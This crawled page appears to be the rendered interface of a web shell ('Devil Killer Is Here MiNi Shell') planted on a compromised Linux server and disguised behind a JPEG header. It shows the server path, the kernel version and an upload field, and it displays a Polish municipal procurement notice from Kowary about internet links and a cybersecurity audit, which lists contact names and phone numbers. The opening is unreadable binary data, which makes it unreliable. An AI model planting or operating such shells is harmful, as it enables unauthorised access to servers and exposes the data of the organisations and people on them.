JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220707/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220707/0024359601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Instalacja łączy internetowych oraz wykonanie diagnozy cyberbezpieczeństwa w ramach realizacji projektu „Poprawa cyfryzacji jednostek Gminy Miejskiej Kowary i ich cyberbezpieczeństwa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA KOWARY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821598</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 1 Maja 1 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kowary</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756439225</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">757613173</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bok@kowary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.kowary.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Instalacja łączy internetowych oraz wykonanie diagnozy cyberbezpieczeństwa w ramach realizacji projektu „Poprawa cyfryzacji jednostek Gminy Miejskiej Kowary i ich cyberbezpieczeństwa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c16bfd3c-fdcf-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00243596</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Cyfrowa Gmina” o numerze POPC.05.01.00-00-0001/21-00, dofinansowany z Funduszy Europejskich w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU działania 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia „Sfinansowano w ramach reakcji Unii na pandemię COVID-19” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.kowary.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">rejestracja na platformie, w tym<br/>złożenie oferty w formie elektronicznej, a także warunki techniczne dotyczące korzystania z Platformy zostały określone w Regulaminie e-Zamówienia, dostępnym pod adresem<br/>https://miniportal.uzp.gov.pl/WarunkiUslug</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z04.05.2016, str. 1),<br/>dalej „RODO”, informuję, że: Administrator, dane kontaktowe Urząd Miasta<br/>Kowary, ul. 1 Maja 1a, 58-530 Kowary: • na adres poczty elektronicznej: bok@kowary.pl, • telefonicznie: +48 7564 39 222, •<br/>pisemnie lub osobiście: na adres wskazany powyżej, w Urzędzie Miasta Kowary<br/>został wyznaczony Inspektor Ochrony Danych, z którym można się skontaktować: • za pomocą poczty elektronicznej: iod@kowary.pl<br/>Cele przetwarzania,podstawa prawna przetwarzania, czas<br/>przechowywania poszczególnych kategorii danych: Dane<br/>będą przetwarzane przez Urząd Miasta i Kowary wyłącznie w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego na podstawie: • art. 6 ust. 1 lit. c) i e) RODO na podstawie Ustawy<br/>z dnia 11września 2019r. prawo zamówień publicznych. Dane będą przechowywane przez okres 4 lat<br/>od zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata,okres przechowywania obejmuje cały czas trwania umowy. Dane mogą zostać udostępnione<br/>osobom lub podmiotom, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>ustawy z dnia 11 września 2019 r. prawo zamówień publicznych.<br/>Prawa osoby, której dane dotyczą: Przysługujące prawa: • na podstawie art. 15 RODO prawo dostępu<br/>do danych osobowych; • na podstawie art. 16 RODO prawo do sprostowania*; • na podstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; • prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych. Prawa nie mające zastosowania: • w związku z art. 17<br/>ust. 3 lit. b,d lub e RODO prawo do usunięcia danych osobowych; • prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO; • na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6<br/>ust. 1 lit. c RODO. * Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą.** **Wyjaśnienie: W postępowaniu o<br/>udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRM.271.53.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Instalacja łączy internetowych w ramach realizacji projektu „Poprawa cyfryzacji jednostek Gminy Miejskiej Kowary i ich cyberbezpieczeństwa „Cyfrowa Gmina” dla następujących niżej wymienionych jednostek:<br/><br/><br/>Lp.	Adres lokalizacji	Parametry minimalne łącza<br/>(download/upload)	Lokalizacja punktu dystrybucyjnego	Osoba do kontaktu na potrzeby oględzin terenowych<br/>	Uwagi dodatkowe <br/>1	Komisariat Policji w Kowarach, <br/>ul. Władysława Grabskiego 7	20/20 Mbps	parter	Sebastian Toporowski <br/>tel. 478731420, 601050269<br/>	Stałe publiczne IP<br/>2	Urząd Miejski w Kowarach budynek A, ul. Maja 1a<br/>	100/100 Mbps<br/>	2 piętro	Maciej Janas<br/>tel. 75 64 56 117	Stałe publiczne IP<br/>3	Miejski Ośrodek Pomocy Społecznej w Kowary, ul. Zamkowa 9	40/40 Mbps	parter	Adam Szumowski (informatyk)<br/>tel. 601554412<br/>Marlena Kowalska tel.75 7182113,<br/> 518 346 790<br/>	Stałe publiczne IP<br/>4	Zarząd Eksploatacji Zasobów Komunalnych w Kowarach,<br/>ul. Dworcowa 11<br/>	200/40 Mbps	parter	Waldemar Kiser (informatyk),<br/> tel. 501624735<br/>	Stałe publiczne IP<br/>5	Przedszkole Publiczne nr 1 w Kowarach,<br/>ul. Sienkiewicza 9	100/20 Mbps	parter	Zofia Olszewska (dyrektor) <br/>tel. 757182534<br/>	<br/>Stałe publiczne IP<br/>6	Miejska Służba Ratownicza w Kowarach,<br/>ul. Zamkowa 2a	80/20 Mbps	1 piętro	Wiesław Kędzierski tel. 695 118 998	Stałe publiczne IP<br/><br/><br/>2.	Oferta winna zawierać koszt instalacji łącza we wskazanej lokalizacji, koszt opłaty łącznej za utrzymanie łącza przez okres 18 miesięcy oraz miesięczny koszt utrzymania łącza po tym okresie. Podpisywana umowa nie może być automatycznie przedłużona po okresie 18 miesięcy (umowa wygasa). Jeśli dana jednostka organizacyjna wyrazi taką wolę, to umowa na kolejny okres będzie zawierana indywidualnie przez Gminę Miejską Kowary – jednostkę organizacyjną, której dotyczy. Płatność za wykonanie podłączenia i opłatę za utrzymanie łącza za 18 miesięcy zostanie dokonana po odbiorze wykonanego podłączenia i podpisaniu umowy na dostęp do internetu/transmisję danych, przez dostawce oraz Gminę Miejską Kowary na podstawie prawidłowo wystawionej faktury VAT.<br/><br/>3.	Zamawiający dopuszcza jedynie przewodowe technologie łącz dostępowych. Preferowana technologia łącza to dostęp światłowodowy. Oferta musi zawierać wszystkie parametry wskazane na formularzu ofertowym. Zamawiający dopuszcza zmianę parametrów łącza w zakresie prędkości przesyłu danych z (download) i do (upload) internetu oraz zmiany dotyczącej symetrii przesyłu danych w obu kierunkach na asymetrię, np.: dla lokalizacji zamawiający w minimalnych parametrach łącza wskazał prędkości 20 Mbps download<br/>oraz 20 Mbps upload - dopuszcza ofertę na łącze o parametrach 200 Mbps download i 20 Mbps upload. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72411000-4 - Dostawcy usług internetowych (ISP)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. cena brutto przedmiotu zamówienia – waga 60 %<br/><br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły:<br/><br/> Pc <br/><br/>Pc – ilość punktów ofert badanej w kryterium cena,<br/>ano – najniższa cena brutto ze wszystkich ważnych ofert,<br/>ank – cena brutto badanej oferty,<br/><br/><br/>2. prędkość przesyłu danych – waga 40%<br/><br/>Prędkość przesyłu danych (Pp) – waga 40%<br/><br/>Punkty za kryterium „prędkość przesyłu danych” dla poszczególnych lokalizacji zostaną przyznane w skali punktowej do 40 punktów. Ilość punktów w tym kryterium przyznana zostanie według poniższej formuły:<br/><br/>Prędkość przesyłu danych, liczone jako średnia arytmetyczna z parametrów downloadu i uploadu łącza wg wzoru poniżej :<br/><br/>pś = (upload+download w Mbps)/2<br/><br/>Pp=pś/npś = x * 40 pkt <br/><br/><br/>Pp – ilość punktów ofert badanej w kryterium prędkości przesyłu danych<br/>npś – najwyższa średnia arytmetyczna z parametrów upload/download oferowanych łącz<br/>pś – średnia arytmetyczna z parametrów upload/download<br/><br/>Oferta o najwyższej średniej arytmetycznej otrzyma 40,00 pkt<br/><br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru:<br/><br/>P = Pc+ Pp<br/><br/>P- łączna ilość punktów badanej oferty<br/>Pc – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34;<br/>Pp – ilość punktów badanej oferty w kryterium oceny &#34;prędkość przesyłu danych&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Prędkość przesyłu danych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Diagnoza cyberbezpieczeństwa” w ramach realizacji projektu „Poprawa cyfryzacji jednostek Gminy Miejskiej Kowary i ich cyberbezpieczeństwa –<br/>„Cyfrowa Gmina”<br/>1.	Diagnoza cyberbezpieczeństwa przeprowadzona winna zostać zgodnie z zakresem oraz formularzem stanowiącym załącznik pn.: „Formularz_informacji_związanych_z_przeprowadzeniem_diagnozy_cyberbezpieczeństwa” (załącznik nr 8) przez osobę posiadająca uprawnienia wykazane w Rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu. <br/><br/>2.	Diagnozę cyberbezpieczeństwa należy dostarczyć w wersji elektronicznej oraz w wersji papierowej. Załączniki do opisu diagnozy cyberbezpieczeństwa: <br/>a)Formularz_informacji_związanych_z_przeprowadzeniem_diagnozy_cyberbezpieczeństwa – Załącznik nr 8;<br/>b) Ocena wybranych aspektów bezpieczeństwa – Załącznik nr 9;<br/>c)	Ocena zgodności z KRI/UoKSC – Załącznik nr 10;<br/>d)	Rozporządzenie Ministra Cyfyzacji w sprawie wykazu certyfikatów – Załącznik nr 11. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71620000-0 - Usługi analizy</p> <p class="mb-0">79212000-3 - Usługi audytu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. cena brutto przedmiotu zamówienia – waga 60 %<br/><br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły:<br/><br/> Pc <br/><br/>Pc – ilość punktów ofert badanej w kryterium cena,<br/>ano – najniższa cena brutto ze wszystkich ważnych ofert,<br/>ank – cena brutto badanej oferty,<br/><br/><br/>2. Termin wykonania zamówienia – waga 40%<br/><br/>Termin wykonania zamówienia (Pt) – waga 40%<br/><br/>Punkty za kryterium „termin wykonania zamówienia” zostanie przyznane w skali punktowej do 40 punktów. Ilość punktów w tym kryterium przyznana zostanie według poniższej formuły:<br/><br/>Zamawiający wymaga wykonanie tej części zamówienia w terminie do dnia 22.08.2022 r.<br/>Wykonawcy otrzymają dodatkowe punkty w tym kryterium oceny ofert w przypadku zaoferowania krótszego terminu wykonania zamówienia tj.:<br/>Wykonanie zamówienia w terminie do dnia 17.08.2022 r. – 20,00 pkt;<br/>Wykonanie zamówienia w terminie do dnia 12.08.2022 r. – 40,00 pkt;<br/><br/>Oferta o terminie wykonania zamówienia krótszym niż 12.08.2022 r. otrzyma 40,00 pkt<br/><br/><br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru:<br/><br/>P = Pc+ Pt<br/><br/>P- łączna ilość punktów badanej oferty<br/>Pc – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34;<br/>Pt – ilość punktów badanej oferty w kryterium oceny &#34;termin wykonania zamówienia&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dotyczy Części II zamówienia:<br/><br/>Wykonawca winien wykazać dysponowanie min. 1 osobą zdolną do wykonania zamówienia, tj. posiadającą jeden z certyfikatów uprawniających do przeprowadzania audytu w zakresie cyberbezpieczeństwa wymienionych w Rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. (Dz. U. z 2018 r., poz. 1999) w sprawie wykazu certyfikatów uprawniających do przeprowadzania audytu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Oświadczenie<br/>wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 o ochronie konkurencji i<br/>konsumentów ( Dz. U. z 2021.275 ), z innym wykonawcą, który złożył ofertę w postępowaniu albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 6 do SWZ)<br/>b) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dotyczy Części II zamówienia:<br/><br/> wykaz osób skierowanych 